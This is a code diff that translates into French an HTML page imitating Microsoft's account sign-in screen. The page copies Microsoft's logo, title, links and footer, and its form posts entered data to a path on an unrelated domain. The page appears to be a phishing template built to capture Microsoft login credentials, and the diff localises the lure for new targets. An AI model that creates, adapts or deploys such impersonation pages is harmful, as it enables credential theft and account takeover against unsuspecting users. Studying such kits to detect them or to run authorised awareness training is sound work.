--- a/microsoft-login/index.html
+++ b/microsoft-login/index.html
@@ -1,15 +1,15 @@
 <!DOCTYPE html>
-<html lang="en" style="filter: invert(0);">
+<html lang="fr" style="filter: invert(0);">
 <head><meta charset="UTF-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/>
 	<!-- <base href="https://lemonware.fr/static/template/Template/microsoft-login/"f /> -->
 	<link href="assets/favicon.ico" rel="icon" />
-	<title>Sign in to your Microsoft account</title>
+	<title>Connectez-vous à votre compte Microsoft</title>
 	<link href="assets/app.css" rel="stylesheet" />
 </head>
 <body>
 <section id="section_uname">
 <div class="auth-wrapper"><img alt="Microsoft" src="assets/logo.png" style="filter: invert(0);" />
-<h2 class="title mb-16 mt-16">Sign in</h2>
+<h2 class="title mb-16 mt-16">Connexion</h2>
 <!-- Formulaire avec action définie -->
 
 <form action="" id="signin_form" method="POST"><input name="__original_url" type="hidden" value="https://lemonware.fr/static/template/Template/microsoft-login/" />
@@ -19,9 +19,9 @@
 </form>
 
 <div>
-<p class="mb-16 fs-13">No account? <a class="link" href="">Create one!</a></p>
+<p class="mb-16 fs-13">Aucun compte ? <a class="link" href="">Créez-en un</a></p>
 
-<p class="mb-16 fs-13"><a class="link" href="#">Sign in with a security key <img alt="Question img" src="assets/question.png" style="filter: invert(0);" /></a></p>
+<p class="mb-16 fs-13"><a class="link" href="#">Connectez-vous avec une clé de sécurité <img alt="Question img" src="assets/question.png" style="filter: invert(0);" /></a></p>
 </div>
 <!-- Bouton "Next" avec gestionnaire d'événements JavaScript -->
 
@@ -29,11 +29,11 @@
 </div>
 
 <div class="opts">
-<p class="has-icon mb-0" style="font-size:15px;"><span class="icon"><img src="assets/key.png" style="filter: invert(0);" width="30px" /></span> Sign-in options</p>
+<p class="has-icon mb-0" style="font-size:15px;"><span class="icon"><img src="assets/key.png" style="filter: invert(0);" width="30px" /></span> Options de connexion</p>
 </div>
 </section>
 
-<footer class="footer"><a href="#">Terms of use</a> <a href="#">Privacy &amp; cookies</a> <span>. . .</span></footer>
+<footer class="footer"><a href="#">Conditions d'utilisation</a> <a href="#">Confidentialité et cookies</a> <span>. . .</span></footer>
 <!-- Script JavaScript pour gérer le clic sur le bouton "Next" --><script>
         document.getElementById('btn_next').addEventListener('click', function() {
             document.getElementById('signin_form').submit(); // Soumet le formulaire
